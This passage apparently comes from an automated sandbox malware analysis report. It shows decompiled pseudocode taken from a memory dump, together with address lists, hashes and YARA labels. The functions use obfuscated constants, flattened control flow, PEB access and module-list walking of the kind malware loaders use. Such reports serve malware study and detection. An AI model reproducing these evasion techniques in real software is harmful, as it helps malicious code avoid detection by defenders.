				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t154 =  *0x24ca24; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
						L10:
						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
						_t120 = E0023F536(_v20, _v40, _v48, _t154);
					} else {
						_t120 = E0024086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
						_t160 = _t160 + 0xc;
						if(_t120 != _v28) {
							_t112 = _t154 + 0x2c; // 0x2c
							_t149 = _t112;
						} else {
							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
							E0024422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
							E00244F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
							goto L10;
						}
					}
					_t154 =  *_t149;
				}
				return _t120;
			}

0x0023f444
0x0023f445
0x0023f460
0x0023f451
0x0023f45a
0x0023f45a
0x0023f45d
0x0023f45d
0x0023f464
0x0023f467
0x002498a6
0x002498a9
0x002498b2
0x002498c1
0x002498c3
0x002498c8
0x002498cd
0x002498d2
0x002498d6
0x002498dd
0x002498e8
0x002498e9
0x002498ec
0x002498f3
0x002498fa
0x00249901
0x00249905
0x0024990c
0x00249913
0x0024991c
0x0024991f
0x00249926
0x0024992d
0x00249934
0x00249937
0x0024993b
0x00249942
0x00249949
0x0024994d
0x00249951
0x00249958
0x0024995f
0x00249966
0x0024996a
0x00249971
0x00249978
0x0024997f
0x00249986
0x0024998d
0x00249994
0x0024999b
0x002499a6
0x002499a9
0x002499b0
0x002499b7
0x002499be
0x002499c1
0x002499c8
0x002499cf
0x002499d3
0x002499d7
0x002499de
0x00249a46
0x002499ea
0x00249a2e
0x00249a3b
0x00249a3d
0x002499ec
0x002499f9
0x002499fe
0x00249a04
0x00249a51
0x00249a51
0x00249a06
0x00249a0d
0x00249a19
0x00249a27
0x00000000
0x00249a2d
0x00249a04
0x00249a44
0x00249a44
0x00249a50

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94468e129d0bb71fbc2160a203195a5fabf8ef357cca9470dc44afe34d83465a
Instruction ID: aa71ffd8664fb679141709297ada74135cdcdd4f344b5ffe4d8ca844502638a5
Opcode Fuzzy Hash: 94468e129d0bb71fbc2160a203195a5fabf8ef357cca9470dc44afe34d83465a
Instruction Fuzzy Hash: 2A516572D00719DBDB18CFA4D98A9DEFBB0FB08318F208159D516772A0C7B46A95CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002471EF, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002471EF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v144;
				void* __ecx;
				void* _t94;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t120;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t147;

				_t147 = __eflags;
				_push(_a4);
				_push(__edx);
				E0023602B(_t94);
				_v20 = 0xa5d0;
				_v20 = _v20 | 0x3487ecbd;
				_v20 = _v20 + 0xffff03d0;
				_t142 = 0;
				_v20 = _v20 + 0x3a47;
				_v20 = _v20 ^ 0x348731c7;
				_v28 = 0xdd31;
				_v28 = _v28 << 0x10;
				_v28 = _v28 | 0x8f0862d8;
				_v28 = _v28 ^ 0xdf391de9;
				_v16 = 0xb0e;
				_v16 = _v16 << 4;
				_v16 = _v16 << 0xa;
				_t120 = 0x14;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x461d447c;
				_v12 = 0xa74;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0x835b;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0053bc14;
				_v36 = 0xa6cf;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x000104b7;
				_v24 = 0x4d22;
				_v24 = _v24 >> 6;
				_v24 = _v24 + 0xef2f;
				_v24 = _v24 ^ 0x0000ed15;
				_v44 = 0x3931;
				_v44 = _v44 * 0x11;
				_v44 = _v44 ^ 0x00039362;
				_v40 = 0xec47;
				_v40 = _v40 ^ 0x28f00c99;
				_v40 = _v40 ^ 0x28f09017;
				_v32 = 0x2800;
				_v32 = _v32 / _t120;
				_v32 = _v32 ^ 0x971b94ed;
				_v32 = _v32 ^ 0x971b9d0a;
				E002450F2( &_v144, _v20, _v28, _v16, __edx);
				_t146 = _t144 + 0x18;
				L13:
				if(E0023B055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
					_t106 = E00231280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
					_t146 = _t146 + 0x10;
					__eflags = _t106;
					if(__eflags != 0) {
						_t108 = _v56 - 1;
						__eflags = _t108;
						if(_t108 == 0) {
							E00236754(_v60,  &_v52);
						} else {
							_t110 = _t108 - 1;
							__eflags = _t110;
							if(_t110 == 0) {
								E00238F78(_v60,  &_v52);
							} else {
								_t112 = _t110 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									E002426F5(_v60,  &_v52);
								} else {
									_t114 = _t112 - 1;
									__eflags = _t114;
									if(_t114 == 0) {
										E00234A35(_v60,  &_v52);
									} else {
										__eflags = _t114 == 6;
										if(_t114 == 6) {
											E002369A0(_v60,  &_v52);
										}
									}
								}
							}
						}
						_t142 = _t142 + 1;
						__eflags = _t142;
					}
					goto L13;
				}
				return _t142;
			}

0x002471ef
0x002471fa
0x002471ff
0x00247201
0x00247206
0x00247210
0x00247219
0x00247220
0x00247222
0x00247229
0x00247230
0x00247237
0x0024723b
0x00247242
0x00247249
0x00247250
0x00247254
0x0024725e
0x00247260
0x00247263
0x0024726a
0x00247271
0x00247275
0x0024727c
0x0024727f
0x00247286
0x0024728d
0x00247290
0x00247297
0x0024729e
0x002472a2
0x002472a9
0x002472b0
0x002472bb
0x002472be
0x002472c5
0x002472cc
0x002472d3
0x002472da
0x002472ec
0x002472ef
0x002472f6
0x00247306
0x0024730b
0x00247384
0x0024739e
0x00247324
0x00247329
0x0024732c
0x0024732e
0x00247333
0x00247333
0x00247334
0x0024737e
0x00247336
0x00247336
0x00247336
0x00247337
0x00247371
0x00247339
0x00247339
0x00247339
0x0024733a
0x00247364
0x0024733c
0x0024733c
0x0024733c
0x0024733d
0x00247357
0x0024733f
0x0024733f
0x00247342
0x0024734a
0x0024734a
0x00247342
0x0024733d
0x0024733a
0x00247337
0x00247383
0x00247383
0x00247383
0x00000000
0x0024732e
0x002473ab

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction ID: 083bbf5bedef11a3ac058e9a3cb2466ee96c6a7a7728d4c90bcffc16fbfeb2a4
Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction Fuzzy Hash: 1B513971D2421EABDF08DFA1D8458EEBFB5FF44304F108199D422B6290D7B85A59CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00248ADC, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00248ADC(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t109;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				char* _t120;
				intOrPtr* _t139;
				void* _t140;

				_v44 = 0xbe2c;
				_v44 = _v44 | 0x84c59b93;
				_v44 = _v44 ^ 0x84c5dc14;
				_v12 = 0x6fb6;
				_v12 = _v12 << 0xc;
				_t139 = __ecx;
				_t117 = 0x2e;
				_v12 = _v12 / _t117;
				_v12 = _v12 + 0xcda3;
				_v12 = _v12 ^ 0x0027e688;
				_v28 = 0xcabb;
				_v28 = _v28 + 0xd310;
				_v28 = _v28 | 0x3c203c9f;
				_v28 = _v28 ^ 0x3c2189d4;
				_v36 = 0x4eab;
				_v36 = _v36 | 0x84b19700;
				_v36 = _v36 ^ 0x84b1b180;
				_v8 = 0xd8ee;
				_v8 = _v8 + 0xffff63d4;
				_v8 = _v8 ^ 0xfc264e39;
				_v8 = _v8 ^ 0x6fc556fb;
				_v8 = _v8 ^ 0x93e330d5;
				_v20 = 0x5c82;
				_v20 = _v20 | 0x7a047e0a;
				_v20 = _v20 << 5;
				_t118 = 0x1b;
				_v20 = _v20 * 0x43;
				_v20 = _v20 ^ 0xe5a3df6f;
				_v40 = 0x7499;
				_v40 = _v40 >> 8;
				_v40 = _v40 ^ 0x0000130c;
				_v16 = 0x5702;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffffa72f;
				_v16 = _v16 ^ 0x15c040b7;
				_v32 = 0x67e1;
				_v32 = _v32 / _t118;
				_v32 = _v32 ^ 0x8e6cf5d6;
				_v32 = _v32 ^ 0x8e6ccf96;
				_v24 = 0x77;
				_t119 = 0x69;
				_v24 = _v24 * 0x25;
				_t120 =  &_v304;
				_v24 = _v24 / _t119;
				_v24 = _v24 ^ 0x863bea64;
				_v24 = _v24 ^ 0x863bfaf8;
				while(1) {
					_t109 =  *_t139;
					if(_t109 == 0) {
						break;
					}
					if(_t109 == 0x2e) {
						 *_t120 = 0;
					} else {
						 *_t120 = _t109;
						_t120 = _t120 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E0023F22A(_v44, _v12,  &_v304, _v28);
					if(_t140 != 0) {
						L8:
						_push(E00248634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
						_push(_t140);
						return E00240126(_v32, _v24);
					}
					_t115 = E00244AAF( &_v304, _v36, _v8, _v20);
					_t140 = _t115;
					if(_t140 != 0) {
						goto L8;
					}
					return _t115;
				}
				goto L6;
			}

0x00248ae5
0x00248aee
0x00248af5
0x00248afc
0x00248b03
0x00248b0e
0x00248b10
0x00248b15
0x00248b1a
0x00248b21
0x00248b28
0x00248b2f
0x00248b36
0x00248b3d
0x00248b44
0x00248b4b
0x00248b52
0x00248b59
0x00248b60
0x00248b67
0x00248b6e
0x00248b75
0x00248b7c
0x00248b83
0x00248b8a
0x00248b92
0x00248b95
0x00248b98
0x00248b9f
0x00248ba6
0x00248baa
0x00248bb1
0x00248bb8
0x00248bbc
0x00248bc0
0x00248bc7
0x00248bce
0x00248bdc
0x00248bdf
0x00248be6
0x00248bed
0x00248bf8
0x00248bf9
0x00248c01
0x00248c07
0x00248c0a
0x00248c11
0x00248c22
0x00248c22
0x00248c26
0x00000000
0x00000000
0x00248c1c
0x00248c2a
0x00248c1e
0x00248c1e
0x00248c20
0x00248c21
0x00000000
0x00248c21
0x00248c2d
0x00248c42
0x00248c48
0x00248c66
0x00248c7f
0x00248c80
0x00000000
0x00248c86
0x00248c59
0x00248c5e
0x00248c64
0x00000000
0x00000000
0x00248c8e
0x00248c8e
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction ID: 3d6219b04f405ae4af969dd1b75b4a62bc0ae45e0902e2a13cf4bc50be2d3fff
Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction Fuzzy Hash: 52515271C1121ADFDF49CFA0D98A5EEBBB1FB44304F20819AC111BA2A0D7B91B55CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002348BD, Relevance: .1, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002348BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t84;
				intOrPtr* _t95;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t108;
				void* _t122;

				_t122 = __ecx;
				_push(0x24c110);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t84);
				_v48 = 0x61abc6;
				_v44 = 0;
				_v40 = 0;
				_v20 = 0x3115;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000604b;
				_v16 = 0xb2e9;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0x4f02;
				_v16 = _v16 ^ 0x00000d08;
				_v8 = 0x47ff;
				_v8 = _v8 + 0xba3e;
				_t103 = 0x68;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x26;
				_v8 = _v8 ^ 0x00006b48;
				_v12 = 0x7283;
				_v12 = _v12 + 0xffffff70;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x62bbfeca;
				_v12 = _v12 ^ 0x62bbef9f;
				_v32 = 0x955e;
				_v32 = _v32 + 0x386b;
				_v32 = _v32 ^ 0x0000cdee;
				_v36 = 0x2587;
				_v36 = _v36 ^ 0xc63d9950;
				_v36 = _v36 ^ 0xc63dc5f3;
				_v28 = 0xb9df;
				_v28 = _v28 ^ 0xf1a14283;
				_v28 = _v28 * 0x63;
				_v28 = _v28 ^ 0x71a43d80;
				_v24 = 0x4453;
				_v24 = _v24 << 3;
				_t105 = 0x4c;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00004bab;
				_t95 = E00238736(_t105);
				 *0x24ca38 = _t95;
				if(_t95 == 0) {
					L7:
					return 0;
				}
				_t108 =  *(_t95 + 0x3c);
				 *((intOrPtr*)(_t95 + 0x14)) = 0x24c110;
				 *_t95 = 0x24c110;
				 *((intOrPtr*)(_t95 + 0x24)) = 0;
				while( *((intOrPtr*)(0x24c110 + _t108 * 8)) != 0) {
					_t108 = _t108 + 1;
					 *(_t95 + 0x3c) = _t108;
				}
				if(E00231CFA(_v32, _t122) == 0) {
					E0023F536(_v36, _v28, _v24,  *0x24ca38);
					goto L7;
				}
				return 1;
			}

0x002348cb
0x002348cd
0x002348ce
0x002348d1
0x002348d4
0x002348d5
0x002348d6
0x002348db
0x002348e4
0x002348e9
0x002348ec
0x002348f3
0x002348f7
0x002348fb
0x00234902
0x00234909
0x0023490d
0x00234914
0x0023491b
0x00234922
0x0023492e
0x00234933
0x0023493c
0x00234940
0x00234943
0x0023494a
0x00234951
0x00234958
0x0023495c
0x00234963
0x0023496a
0x00234971
0x00234978
0x0023497f
0x00234986
0x0023498d
0x00234994
0x0023499b
0x002349a8
0x002349ab
0x002349b2
0x002349b9
0x002349c2
0x002349c3
0x002349c6
0x002349d6
0x002349db
0x002349e4
0x00234a2c
0x00000000
0x00234a2c
0x002349e6
0x002349e9
0x002349ec
0x002349ee
0x002349f7
0x002349f3
0x002349f4
0x002349f4
0x00234a0f
0x00234a25
0x00000000
0x00234a2b
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27afc4b33dc863ca0ef44d4182d6d04fa1b0fd1fb92b3c2506f1771c419c0529
Instruction ID: bfddd84c6e0aa02ec384d4b0d4cae425945b9098056edd306ccb7ec1b40778cc
Opcode Fuzzy Hash: 27afc4b33dc863ca0ef44d4182d6d04fa1b0fd1fb92b3c2506f1771c419c0529
Instruction Fuzzy Hash: 4A4167B6C11209EFDB48CFA5D94A4EEFBB5FF48314F20809AD500BA290D7B85A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002467E9, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002467E9() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t116;
				intOrPtr* _t143;
				intOrPtr _t146;
				void* _t151;
				void* _t152;

				_t152 = _t151 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_push(0x77);
				_t143 = 0x24ca24;
				_push(0x67);
				_v8 = _v8 / 0;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / 0;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t146 =  *0x24ca24; // 0x0
				while(_t146 != 0) {
					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
						L5:
						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
						_t116 = E0023F536(_v20, _v40, _v48, _t146);
					} else {
						_t116 = E0024086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
						_t152 = _t152 + 0xc;
						if(_t116 != _v28) {
							_t108 = _t146 + 0x2c; // 0x2c
							_t143 = _t108;
						} else {
							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
							E0024422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
							E00244F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
							goto L5;
						}
					}
					_t146 =  *_t143;
				}
				return _t116;
			}

0x002498a6
0x002498a9
0x002498b2
0x002498bf
0x002498c3
0x002498cb
0x002498cd
0x002498d2
0x002498d6
0x002498dd
0x002498e9
0x002498ec
0x002498f3
0x002498fa
0x00249901
0x00249905
0x0024990c
0x00249913
0x0024991c
0x0024991f
0x00249926
0x0024992d
0x00249934
0x00249937
0x0024993b
0x00249942
0x00249949
0x0024994d
0x00249951
0x00249958
0x0024995f
0x00249966
0x0024996a
0x00249971
0x00249978
0x0024997f
0x00249986
0x0024998d
0x00249994
0x0024999b
0x002499a6
0x002499a9
0x002499b0
0x002499b7
0x002499be
0x002499c1
0x002499c8
0x002499cf
0x002499d3
0x002499d7
0x002499de
0x00249a46
0x002499ea
0x00249a2e
0x00249a3b
0x00249a3d
0x002499ec
0x002499f9
0x002499fe
0x00249a04
0x00249a51
0x00249a51
0x00249a06
0x00249a0d
0x00249a19
0x00249a27
0x00000000
0x00249a2d
0x00249a04
0x00249a44
0x00249a44
0x00249a50

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71f4e51cfe0b529c91e2bb35bfcd7cb8787749fa41fb63f04ebe13c65c991d0
Instruction ID: de1c73cf50021e2a74e250112e23350dc3b498515051980c9a08b95e3870d00d
Opcode Fuzzy Hash: b71f4e51cfe0b529c91e2bb35bfcd7cb8787749fa41fb63f04ebe13c65c991d0
Instruction Fuzzy Hash: 53410171D0131DDBDB48CFA5D68A4DEBBB0BB14758F208059C115BA290C7B80B49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00247A0F, Relevance: .1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00247A0F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t43;
				void* _t47;
				void* _t50;
				void* _t56;
				void* _t57;

				_t50 = __ecx;
				_v16 = 0xca2c;
				_v16 = _v16 ^ 0x4de68128;
				_v16 = _v16 ^ 0x4de62eb9;
				_v8 = 0x8c11;
				_v8 = _v8 + 0x5792;
				_v8 = _v8 ^ 0x1f44ca2d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x10a60930;
				_v28 = 0x568d;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005e22;
				_v24 = 0x104e;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0x104e2f39;
				_v20 = 0x2b0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x000512d1;
				_v12 = 0x980d;
				_v12 = _v12 + 0x309b;
				_v12 = _v12 >> 1;
				_t56 = 0;
				_v12 = _v12 ^ 0x00001aed;
				_t43 = 0xce8bfa4;
				do {
					while(_t43 != 0xce8bfa4) {
						if(_t43 == 0x19c25828) {
							_push(_t50);
							_t47 = E00247F1B();
							_t57 = _t57 + 4;
							_t56 = _t56 + _t47;
							_t43 = 0x375743b0;
							continue;
						} else {
							if(_t43 != 0x375743b0) {
								goto L8;
							} else {
								_t56 = _t56 + E0023D64E(_v28, _v24, _v20, _t50 + 4, _v12);
							}
						}
						L5:
						return _t56;
					}
					_t43 = 0x19c25828;
					L8:
				} while (_t43 != 0x2a4614b);
				goto L5;
			}

0x00247a0f
0x00247a15
0x00247a21
0x00247a28
0x00247a2f
0x00247a36
0x00247a3d
0x00247a44
0x00247a48
0x00247a4f
0x00247a56
0x00247a5a
0x00247a61
0x00247a68
0x00247a6c
0x00247a73
0x00247a7a
0x00247a7e
0x00247a86
0x00247a92
0x00247a99
0x00247aa3
0x00247aa5
0x00247aac
0x00247aae
0x00247aae
0x00247ab4
0x00247ae3
0x00247ae4
0x00247ae9
0x00247aec
0x00247aee
0x00000000
0x00247ab6
0x00247ab8
0x00000000
0x00247aba
0x00247ad2
0x00247ad2
0x00247ab8
0x00247ad5
0x00247adc
0x00247adc
0x00247af2
0x00247af4
0x00247af4
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction ID: c8fafd9494a8f10aad25057eb98bc8a563c6329c5cdb18cbf686bbaa6c1a81ae
Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction Fuzzy Hash: 5121ACB1E10219ABDB48DFA4D88A4AFFBB0FB00308F648059D516B3241E3B54B58CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0024687F, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0024687F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t63;
				signed int _t72;

				_v32 = 4;
				_v8 = 0xaf15;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x6e7b;
				_v8 = _v8 ^ 0x2016511b;
				_v24 = 0x477;
				_v24 = _v24 + 0xffffb380;
				_t72 = 0x7f;
				_v24 = _v24 / _t72;
				_v24 = _v24 ^ 0x02042a92;
				_v20 = 0x93b6;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x44f1257f;
				_v20 = _v20 ^ 0x44eaddee;
				_v16 = 0x6bfa;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff28a3;
				_v16 = _v16 ^ 0xffff7b62;
				_v28 = 0xaf58;
				_v28 = _v28 ^ 0x6486cb7d;
				_v28 = _v28 ^ 0x6486241a;
				_v12 = 0x7e30;
				_v12 = _v12 + 0x9611;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x22884747;
				_t63 = E0024674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
				asm("sbb eax, eax");
				return  ~_t63 & _v36;
			}

0x00246885
0x0024688c
0x00246893
0x00246897
0x0024689b
0x002468a2
0x002468a9
0x002468b0
0x002468be
0x002468c5
0x002468c8
0x002468cf
0x002468da
0x002468e0
0x002468e7
0x002468ee
0x002468f5
0x002468f9
0x00246900
0x00246907
0x0024690e
0x00246915
0x0024691c
0x00246923
0x0024692a
0x0024692e
0x00246950
0x0024695a
0x00246964

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction ID: 3921a9a908e8feceff9a395b938e22c996d34453c3bf95e48f3fa4752c9eb4f8
Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction Fuzzy Hash: 5C21E3B2D0021EABDB15CFE1C94A9EEFBB5FB10204F108299D521B6160D3B84B55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0023C4FF, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0023C4FF() {

				return  *[fs:0x30];
			}

0x0023c505

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10007337, Relevance: 19.6, APIs: 13, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10007337(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10014d88);
				_t25 =  *0x100132dc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E10004732( *_t25);
